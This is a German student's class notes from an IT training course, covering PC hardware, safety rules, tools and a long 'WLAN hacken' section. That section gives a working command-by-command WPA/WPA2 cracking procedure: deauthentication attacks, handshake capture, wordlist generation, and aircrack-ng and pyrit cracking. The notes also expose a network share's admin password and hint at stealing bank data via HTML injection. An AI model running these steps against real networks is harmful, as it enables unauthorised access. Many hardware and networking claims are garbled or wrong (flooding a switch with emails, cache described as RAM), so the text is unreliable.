Zusammenfassung Vom Unterrricht Der Cimdata Seit Dem 14
Total Page:16
File Type:pdf, Size:1020Kb
Zusammenfassung vom Unterrricht der Cimdata seit dem 14. 3. 2016 bis zur Gegenwart: Anmerkung: Im Ordner ist ein noch höherer Informationsgehalt als hier zu lesen ist z.B. bei der Berechnung der Anzahl der Subnetze, die mit einer Subnetzmaske möglich sind. 29.3.2016 Kurze Abfrage des hardwaretechnischen Vorwissens von Markus Liebenow: Was gehört zum Main-/Motherboard? (z.B. UEFI, PCH, RAID-Controller) Was gehört zum Netzwerk? (z.B. ATX/AX; Redundanz). Redudanz = Die Tatsache, dass etwas als Information überflüssig ist. Was gehört zum Prozessor? ( z.B. L1/L2 – Cache; Kühlung; Stack Pointer (Im Steuerwerk) und sie sind von AMD und Intel) RAM? (z.B. FSB; Kapazität) SSD/HDD? (Z.B ISE und SATA1 und SATA2 und SATA3) Gehäuse? (ATX-Bauform, Mini-ATX) Präsentation vom Prozessor : Was ist er? Er ist eine elektronische Schaltung. Themen: Sockel, Firmen, (AMD/Intel); ALU; Register; L1/L2-Speicher; Kühlung; Grafik. Der Prozessor gibt als Zentralsteuerung die Nutzereingaben an die übrige Hard- und Software weiter. Sie sind microcontroller in eingebetteten Systemen. Je kleiner die Litografie, desto mehr Register hat er und leistungsfähiger ist der Prozessor! „Cache ist dafür da.“ steht in meinen handschriftl. Notizen! -Sockel von Hersteller zu Hersteller verschieden -ALU‘s; Fließkommakomponenten. -Register nicht mit A-Speicher verwechseln; keine längerfristige Ablage von Infos im Register möglich (also, im Steuerwerk). - Das Steuerwerk ist zur Ausführung von Programmcode gedacht; Stack-Pointer. - Befehlstabelle - Funktionsweise: Fetch, Decode, Fetch Operands, Execute (Von-Neumann-Zyklus). - Zuses Z1-Rechner war eine ALU eines Prozessors. ALU: 1. Fetch: Die Adresse des Maschinenbefehls wurde ins Steuerwerk gebracht und Daten in den Speicherkontroller geholt. 2. Decode: Befehlsdecoder schlüsselt Rohdaten in Maschinenbefehle auf. 3. Fetch Operands: Werte und Parameter der Befehle werden in‘s Register und die ALU geladen und Neuberechnung der Daten 4. Execute: Die Befehle werden ausgeführt. (Markus, unser Dozent, fand dies alles logisch gut erklärt.) Im Speichercontroller gibt es drei Arten von Arbeitsspeicher: L1, L2 und L3. 31.3.2016: 5 Sicherheitsregeln und Vorstellung von Programmen undWebsites: 1. Freischalten; 2. Vor Wassereinschalten sichern; 3. Erden und kurzschließen; 4.Spannungsfreiheit feststellen; 5. Benachbarte, unter Spannung stehende Teile abdecken, oder abschranken. Bei Hypervisor-Software kann Hardware zur Optimierung eingesetzt werden. Aufgaben vom Marketing: Konzepte, Analysen, instrument, Marktorientierung. Treiber direkt vom Grafikkartenhersteller runter laden. Vorstellung von Programm, von Internet-Site: Ich stellte Blog.Fefe.de vor. -Was ist Wysips-Technologie? -Bei ClipGrap ist Streamen legal. -Mit Mumin kann man allen Internet-Traffic am Gerät beobachten. -Der Windows-Remote-Desktop ist hauseigen und erlaubt den Zugriff auf einen Server. So wie Filezilla, vermutlich. - Zur IP-Verschleierung bei VPN-Tunneln kann man „Hideme“ verwenden. 6.4.2016: WLAN hacken mit Markus Liebenow: Hub = sendet alles auf alle Ports Switch = Er weiß, wo die Daten hingehen (sendet Paket an den Zielport). Wie man den Switch in den Hub-Modus schaltet? Indem man ihn mit E-Mails bombardiert! Northbridge: Kommunikationsschnittstelle zwischen Prozessor, RAM und PCIExpress (Grafik nur zu 50% wichtig .. auf der PCIExpress??). Southbridge: USB, Audio, Lsp2, Festplatten, Netzwerk und PCI (nicht PCIExpress). Beide liegen unter Kühlkörpern. Ein RAM kann, je nach Mainboard, einen Dual-Channel-Modus haben (es kann auf einem Mainboard zwei blaue, aber auch zwei schwarze, geben). Probleme zwischen Mainboard und Arbeitsspeicher? Es gibt lange Listen drüber! Man sollte beim Mainboard-Kauf gleich auf Mainboard-RAM-Kit‘s setzen! Weil, wenn ein RAM mal nur 1600 HZ haben sollte, obwohl man 2400 Hz raus holen kann, wird auf den schwächeren runter getaktet (Geschwindigkeit Hz hat nichts mit Gesamtspeicher zu tun. Das ist ein Unterschied zwischen Bussen und Frequenzen). Busse sind Leitungen auf dem Mainboard. Dort gibt es z.B. den Frontzeit-Bus. Hat er 1126 Mhz, ist dies der Taktgeber im System! Der Takt des Prozessors wird mit dem Multiplikator eingestellt. 200 Mhz FSB * Multiplikator16 = Taktrate 3,2 Gigahertz! Googlen: „Hertzzahl, Chipsatz, Bus“. Taktfrequenz und Bus-Breite (in Bit) bestimmen die Geschwindigkeit, mit denen Daten zwischen CPU und dem Chipsatz übertragen werden. Vom Prozessor (Intel i7660, oder meinem, oder dem auf Arbeit) hängt auch ab, ob er VirtualBox kann (Hyperthreading Voraussetzung). CAS = Gibt an, wieviel Daten, damit er takten kann. RAM unterliegt Tagespreisen. Man bekommt Elektronik billiger, wenn man sich ein Gewerbe anmeldet! Games nicht auf Dual-Channel machen. Mit 8 Bit kann man 256 verschiedene Zustände ar stellen. -Der Linux USB Image-Creator (unter Windows) ist ein Linux Live USB-Creator; damit war die Installation vom Kali-Linux möglich. - In einem DIV-Container unter HTML kann man rein packen, was man will und andere hacken (die Bankdaten). - WLAN hacken mit aircrack-ng. Airodump; Kismet; Airocrack. Netzwerkstick auf „Monitor“ schalten, um zu „sniffen“. Ab 5000 Paketen fängt man an zu rechnen. SSID = WLAN-Name; z.B. vom Klassen-WLAN ist die SSID „Funkturm“. Dechiffrieren (ich hatte mir dazu ein seitenlanges PDF dazu erarbeitet und brauchte nur noch jemanden für den Handshake)!! Standard-PW unter dem Kali-Linux-Live-System: „toor“. -Bruteforce-Methode: scp -P22220 /home/max/Schreibtisch/password.txt [email protected]:public_html/ Und, im Kali-Linux vom Server zum Desktop: scp -P22220 phantasy 2 @188.68.50.27:public_html/password.txt /usr/share/wordlists/ ( Was bei mir bisher klapppte: WPA-Hacking! Aber kein WEP ohne Fremdaufsicht! airmon-ng ifconfig airmon-ng start wlan0 kill 978 kill 1059 kill 1113 airmon-ng check wlan0mon airodump-ng wlan0mon airodump-ng –bssid (mac-Adresse des zu hackenden wlan‘s) -c (channel des zu hackenden wlan‘s) -w (phantasiename) wlan0mon neue shell: aireplay-ng -0 50 -a (mac-Adresse des zu hackenden wlan‘s) -c (Handshake des zu hackenden wlans, in der ersten shell in der 2. reihe mit bssid und station als 2. mac-adresse erkennbar) wlan0mon eine weile laufen lassen stoppen neue shell: crunch 8 8 0123456789 -o pw.lst (die zwei Achter .. acht Zeichen sollte auch das Passwort lang sein. Dann ist Crunch irgendwann fertig. Dann: airodump-ng –bssid (mac-Adresse des zu hackenden wlan‘s) -c (channel des zu hackenden wlan‘s) -w (phantasiename) wlan0mon wiederholen. Dann: aireplay-ng -0 50 -a (mac-Adresse des zu hackenden wlan‘s) -c (Handshake des zu hackenden wlans, in der ersten shell in der 2. reihe mit bssid und station als 2. mac-adresse erkennbar) wlan0mon wiederholen. Aircrack-ng -w pw.lst bla.cap aircrack-ng -w pw.lst (phantasiename).cap und wenn er dann beim Entschlüsseln der passphrase ist, bin ich fast fertig und kann nur hoffen, dass Kali Linux nicht schon wieder abstürzt! ) Wie es allerdings Markus genau gemacht hatte, werde ich noch mal fragen. aircrack-ng –bssid 34:81..(bssid) -a 2 -w ~/home.txt wpaaa-01.cap -a steht für attack mode und -w führt den pfad zur wordlist an. Man kann auhc den absoluten, also den ganzen, pfad eingeben. „dann noch mal Pakete mit schneiden“ airodump-ng –ssid Funkturm –channel 1 –write wlandasgehacktwird wlan0 Achtung, die Zeilen sind wahrscheinlich nicht in richtiger Reihenfolge.. Dann heißt es: Wenn Handshake da ist, den airodump-ng – Befehl abentern !! „Über den Capture lässt er die Passwörter rüberfließen“ ← was immer das heißen mag. airodump-ng -e Funkturm -n 2 -w passwort.txt maa-01.cap Die Cap-Datei wurde vorher mit airocrack erstellt. Hier, wie man wpa2 + Buchstaben cracken kann: http://brechthold.contempt-it.com/2014/01/05/wpa2-unter-kali-linux/ airmon-ng ifconfig airmon-ng start wlan0 kill 978 kill 1059 kill 1113 airmon-ng check wlan0mon airodump-ng wlan0mon airodump-ng --channel (zielchannel) --bssid (ziel-mac-adresse) --write wpa2-dump wlan0mon Auf Handshake warten neue Konsole: aireplay-ng --deauth 0 -a (ziel-mac-adresse) wlan0mon airmon-ng stop wlan0mon Dann sollten wir airodump-ng als auch den Monitor Mode unserer Karte beenden. airmon-ng stop wlan0mon ls -ahl (dann sieht man die cap-datei) pyrit -r wpa2-dump-01.cap analyze pyrit -r wpa2-dump-01.cap -o handshakes.cap strip Zeigt die Größe der neu erzeugten Datei handshakes-cap an: ls -ahl handshakes.cap pyrit -r handshakes.cap -i /usr/share/wordlists/rockyou.txt.gz attack_passthrough oder: pyrit -r handshakes.cap -i /usr/share/wordlists/password.txt attack_passthrough time pyrit -r handshakes.cap -i /usr/share/wordlists/rockyou.txt.gz attack_passthrough Dann sollte das Passwort, dass ganz vorne in der Liste steht (beim einfachen testen) schon geknackt sein. Das war es auch. Zum Testen nächste Woche, mit Markus, wird das auch ausreichen. Es geht weiter mit: pyrit -i /wordlists/FULLlist.txt import_passwords Wenn man das Cracktool Pyrit auf Kali-Linux verwendet,, lohnt es sich auch noch, eine starke Grafikkarte im Gepäck zu haben! Mehr geben meine Notizen nicht mehr her! - Die Kunst der Täuschung von Kevin Mitnick (Social Engeneering) Sousal endschaing 11.4.2016: USB-Stick machen: WIN USB-CD; Stick: *.iso; PC benötigt. Greasemonkey: Browsererweiterung, um Browser als Client manipulieren zu können. Netzwerk von der Cimdata GmbH: \\192.168.0.1 Admin-PW: Cimdata3258 -Guter Virenscanner ist z.B. es/et. -PCI und PCIExpresss-Unterschied. -Mainboard-Versionen(ATX; Mini-ATX) -Unter 600 Watt kein Netzteil kaufen. -Intel i5 1750k. Das k steht dabei für Multiplikator, also, dass man diesen Prozessor takten kann.